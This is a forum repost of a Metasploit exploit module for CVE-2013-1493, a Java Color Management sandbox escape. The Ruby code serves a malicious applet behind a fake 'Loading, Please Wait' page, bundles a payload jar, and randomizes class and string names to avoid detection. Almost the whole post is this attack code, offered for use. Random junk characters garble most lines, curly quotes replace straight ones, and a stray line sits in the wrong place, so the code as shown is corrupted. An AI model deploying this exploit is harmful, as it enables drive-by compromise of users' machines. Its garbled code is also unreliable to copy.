##
2 [9 I2 T% ]! ~/ X& w3 b* f: B' W! E( i/ S% C; o
# This file is part of the Metasploit Framework and may be subject to
" W( H% u* j: N# redistribution and commercial restrictions. Please see the Metasploit
6 U6 _% r2 S z! @# web site for more information on licensing and terms of use.$ M, [! t3 j) X1 k J
# http://metasploit.com/
; w2 `( h$ W0 w# I) u% C+ N##
$ \- L) X4 D, k/ \require ‘msf/core’7 u& b6 \3 y! ]( K1 B2 {
require ‘rex’! ?, A9 O' M0 h) Q/ ^6 Q# X' K1 r
class Metasploit3 < Msf::Exploit::Remote
- K, F/ K& w- O3 K! r5 URank = NormalRanking
; G9 l4 D1 C1 j. ~' L! vinclude Msf::Exploit::Remote::HttpServer::HTML+ X2 i b+ |7 J$ o
include Msf::Exploit::EXE, g9 f+ O( Z! M+ R8 j' x( D
include Msf::Exploit::Remote::BrowserAutopwn
8 m. w% B4 `9 j' m* w/ R. rautopwn_info({ :javascript => false })
0 e4 f% Y; R: u) e" ddef initialize( info = {} )
: _* Q3 Y7 m9 ^8 \- L$ ~3 D8 Bsuper( update_info( info,' Z9 R1 e0 [) U
‘Name’ => ‘Java CMM Remote Code Execution’,
2 t) ?1 J t0 h7 i& Q$ u) V# r‘Description’ => %q{
2 n0 f# v7 ~& G4 H! IThis module abuses the Color Management classes from a Java Applet to run0 L: W! [- M- ]. M
arbitrary Java code outside of the sandbox as exploited in the wild in February1 |! B$ j4 `# [" b2 }# g% [
and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u410 e- `7 [0 ]3 V) s% w. Y
and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
+ W# K+ Q5 V) a5 }' G" jsystems. This exploit doesn’t bypass click-to-play, so the user must accept the java
* U+ [. D9 r' u( y! i5 Qwarning in order to run the malicious applet.$ R1 ~% E& ]- T8 }- S3 ^
},
7 x+ s3 c: u; M- i) d‘License’ => MSF_LICENSE,
% x4 a' j) H6 K6 q/ ]+ y: {‘Author’ =>2 _. A5 J) c, ~ M5 ?2 Q+ i
'Unknown', # Vulnerability discovery and Exploit
) }) @& N- M$ h! Q$ A5 i. f" G'juan vazquez' # Metasploit module (just ported the published exploit)! w7 [: k, `, B% N
],
; K+ o" o1 i% ?4 h# Z2 G$ E‘References’ =>6 x% j* e! A4 z8 r7 a6 U
[/ x* R; D/ m' F I
[ 'CVE', '2013-1493' ],
, M, W0 r2 \/ m[ 'OSVDB', '90737' ],& L" j: [4 G U% m4 n
[ 'BID', '58238' ],
: e- h; R" r. w8 M- `! k0 x[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
$ g6 s6 ~/ c Y/ ][ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],2 [2 L, ^0 _7 u0 a1 j
[ 'URL', 'http://pastie.org/pastes/6581034' ]6 _+ }$ [& v9 q# V8 [
],6 N' p" d! ]2 ^# Z/ U
‘Platform’ => [ 'win', 'java' ],/ p: G4 f( n" Y" B" n2 i
‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },( p+ a% _$ X, D
‘Targets’ =>
8 u! v0 ]6 b$ c- L' b2 P[& d! p4 z3 \( t5 L! b
[ 'Generic (Java Payload)',
! n |' b/ c% {. n) a{) W' Y' R+ L. s. n/ B$ B. W
'Platform' => 'java',
' e$ l4 n; |# |' r X1 p'Arch' => ARCH_JAVA
% G, n: j! `% h* Q% P; y}
' e; K" W3 f. X' ^8 {7 I],- Y: t% p' u: t
[ 'Windows x86 (Native Payload)',
( u& D. y0 U W* C. F; ]0 }- |; W{9 H7 K' ?% z/ Y
'Platform' => 'win',
. D) P+ {: E: j'Arch' => ARCH_X86
: e$ @5 x" c) W8 M}
4 A, U' ?( q7 y" Y+ y0 z]0 E5 \" W$ N- e2 e% V( ?. [; ?; }
],* p2 u: L. \+ D! s9 n1 m
‘‘DisclosureDate’ => ‘Mar 01 2013′: b% }1 q' P; e/ g6 C5 l
))5 T0 j) B# Q4 ^
end
\/ l" R( C, N& k9 |6 A& X( Vdef setup
) p. U& L8 n% e: ypath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)) R* G. f. s- K i
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
8 J: H5 n9 ~" P; Fpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)! |( R& T7 Y* I" A& ~, l
@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
7 G5 p9 X$ N& _path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)' z0 ^& {5 b% h' e% D
@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }. q$ U" r3 @" `& c- x Q% i: S
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
/ p. k4 c7 c Z- n5 r: X@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
r+ a/ C' e4 `1 w@init_class_name = rand_text_alpha(“Init”.length)" K! L8 Z2 Y5 E9 \
@init_class.gsub!(“Init”, @init_class_name). {' a( C" F) n1 _) j( \
super
# F( K6 G) r; l- ]' `. x- ? Jend t& c# c+ P; ]. y3 Y; C" N
def on_request_uri(cli, request)) Y* D6 ^- B& a5 I6 Y6 p( Z
print_status(“handling request for #{request.uri}”)% ?' T1 T% f5 [+ T% A0 a# Z6 G% n1 Q
case request.uri$ D$ K ]: s. i. H" \
when /\.jar$/i
: s L( W4 \+ V: E; x3 s; [7 k3 |jar = payload.encoded_jar
/ T$ Z1 l: ~6 D4 u# Ojar.add_file(“#{@init_class_name}.class”, @init_class)
+ ]1 I/ f6 V+ {; tjar.add_file(“Leak.class”, @leak_class)
# W1 _; ~! Z+ r+ K8 Hjar.add_file(“MyBufferedImage.class”, @buffered_image_class)* X/ t( ~7 M# K$ _$ B
jar.add_file(“MyColorSpace.class”, @color_space_class)
7 U. w7 x K& P+ |' cDefaultTarget’ => 1,* Y( C/ T3 ^7 w
metasploit_str = rand_text_alpha(“metasploit”.length)3 Z: F& K8 c! U6 ?
payload_str = rand_text_alpha(“payload”.length)
3 G( S6 q; Y8 }jar.entries.each { |entry|3 W$ n% t9 e8 |, O1 f, R
entry.name.gsub!(“metasploit”, metasploit_str)
7 j: S p2 k, gentry.name.gsub!(“Payload”, payload_str)! V8 l$ u; t: o% \$ N; ]6 z
entry.data = entry.data.gsub(“metasploit”, metasploit_str)
& L0 c! C" S7 S# A& r: s; Gentry.data = entry.data.gsub(“Payload”, payload_str)
1 q: H" S1 J3 K0 @8 M7 \}7 j5 }6 ?1 A% y- B
jar.build_manifest
& r8 U N5 F- h' fsend_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })# S; q+ l ?6 }4 b
when /\/$/
+ i) A# u( j( R* P. n# q1 ^payload = regenerate_payload(cli)) n& s. Q! d; H, d7 E8 M" J
if not payload1 a- g. Y6 W. J/ U7 u
print_error(“Failed to generate the payload.”); b# f2 n; H3 V! I% L! n! n
send_not_found(cli)
6 l1 ]( |; |( Qreturn( n4 x; e; p9 H2 Q2 H, P
end; i, E# J. A9 ^- Y1 h$ g3 }
send_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })/ x5 u, w9 a0 E% `( f1 }
else) i' |8 C1 m, f- N! ]$ R9 n& q
send_redirect(cli, get_resource() + ‘/’, ”)( g \1 Y3 n2 ?$ U* M, k& j5 ~1 L
end
" Y" }7 N2 T/ f( oend
; f8 }' K+ g! x+ sdef generate_html9 U7 C i8 U8 {/ F9 x
html = %Q|<html><head><title>Loading, Please Wait…</title></head>|
- u. |, ^3 { ^7 Y! q2 qhtml += %Q|<body><center><p>Loading, Please Wait…</p></center>|
' b% n; M1 k$ ?9 s! w# chtml += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
) V: Q; p/ K% w# t7 k! E' A/ L) dhtml += %Q|</applet></body></html>|$ `& x) _; T( ]6 z- T1 J* G
return html
( D* v1 w# R6 Xend
# }" V- n% M) B. a9 Uend1 T& M8 n0 f7 ~; F1 l
end5 G2 T2 a( a& v7 x5 U. ?1 y2 M. ~
|
发表于 2013-4-4 17:31:17
收藏
支持
反对